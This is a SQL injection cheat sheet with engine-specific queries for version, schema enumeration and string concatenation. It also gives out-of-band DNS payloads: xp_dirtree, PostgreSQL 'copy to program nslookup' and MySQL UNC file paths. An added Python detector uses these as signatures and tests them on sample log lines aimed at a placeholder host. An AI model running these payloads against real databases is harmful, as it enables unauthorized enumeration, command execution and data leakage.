Introduction

Once SQL injection has been identified, the next step is to enumerate the underlying database engine. Unfortunately, each database engine uses its own syntax for metadata, which makes this process highly engine-dependent.

Database Version

Database      Version Info
Oracle        SELECT banner FROM v$version
              SELECT version FROM v$instance
Microsoft     SELECT @@version
PostgreSQL    SELECT version()
MySQL         SELECT @@version

Database Contents

Listing tables and the columns they contain:

Database      Contents Info
Oracle        SELECT * FROM all_tables
              SELECT * FROM all_tab_columns WHERE table_name = 'Table Name'
Microsoft     SELECT * FROM information_schema.tables
              SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'
PostgreSQL    SELECT * FROM information_schema.tables
              SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'
MySQL         SELECT * FROM information_schema.tables
              SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'

String Concatenation

Database      Concatenation
Oracle        'a'||'b'
Microsoft     'a'+'b'
PostgreSQL    'a'||'b'
MySQL         'a' 'b' (note the space between the two strings) or CONCAT('a','b')

DNS Lookups

Database      Lookup Syntax
Oracle        SELECT UTL_INADDR.get_host_address('domain') (requires elevated privileges)
Microsoft     exec master..xp_dirtree '//domain/a'
PostgreSQL    copy (SELECT '') to program 'nslookup domain'
MySQL         These work only on Windows:
              LOAD_FILE('\\\\domain\\a')
              SELECT ... INTO OUTFILE '\\\\domain\\a'
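
Because each engine exposes its metadata and network functions under distinctive names, the syntax in the tables above can also serve as detection signatures. The following Python is an added example, not part of the original page: it scans logged statements or request parameters for those constructs and labels the likely target engine. The function names, the sample entries and the canary.example domain are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# (engine label, technique, pattern) derived from the tables above.
SIGNATURES = [(e, t, re.compile(p, re.I)) for e, t, p in [
    ("Oracle", "version", r"\bv\$(version|instance)\b"),
    ("Microsoft/MySQL", "version", r"@@version\b"),
    ("PostgreSQL", "version", r"\bversion\s*\(\s*\)"),
    ("Oracle", "contents", r"\ball_(tables|tab_columns)\b"),
    ("Microsoft/PostgreSQL/MySQL", "contents",
     r"\binformation_schema\s*\.\s*(tables|columns)\b"),
    ("Oracle", "dns", r"\butl_inaddr\s*\.\s*get_host_address\b"),
    ("Microsoft", "dns", r"\bxp_dirtree\b"),
    ("PostgreSQL", "dns", r"\bcopy\b.*\bto\s+program\b"),
    # UNC path (two or more backslashes) handed to a MySQL file function
    ("MySQL", "dns", r"\b(load_file\s*\(|into\s+outfile)\s*'\\\\"),
]]

def normalize(value):
    """Undo up to two layers of URL encoding, then collapse whitespace."""
    for _ in range(2):
        value = unquote_plus(value)
    return re.sub(r"\s+", " ", value)

def classify(value):
    """Return [(engine, technique), ...] for every signature that matches."""
    text = normalize(value)
    return [(e, t) for e, t, rx in SIGNATURES if rx.search(text)]

def scan(lines):
    """Map 1-based line number -> hits, skipping lines with no match."""
    hits = {}
    for n, line in enumerate(lines, 1):
        found = classify(line)
        if found:
            hits[n] = found
    return hits

SAMPLE_LOG = [  # constructed entries; canary.example is a placeholder
    "SELECT name FROM products WHERE id = 7",
    "SELECT banner FROM v$version",
    "select%20*%20from%20INFORMATION_SCHEMA.tables",
    "exec+master..xp_dirtree+'//canary.example/a'",
    r"SELECT LOAD_FILE('\\\\canary.example\\a')",
    "copy (SELECT '') to program 'nslookup canary.example'",
    "q=information+schema+design",
]

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        print(n, found)
```

Legitimate administration and ORM tooling also query information_schema, so hits from application-facing accounts or request parameters are the ones worth alerting on.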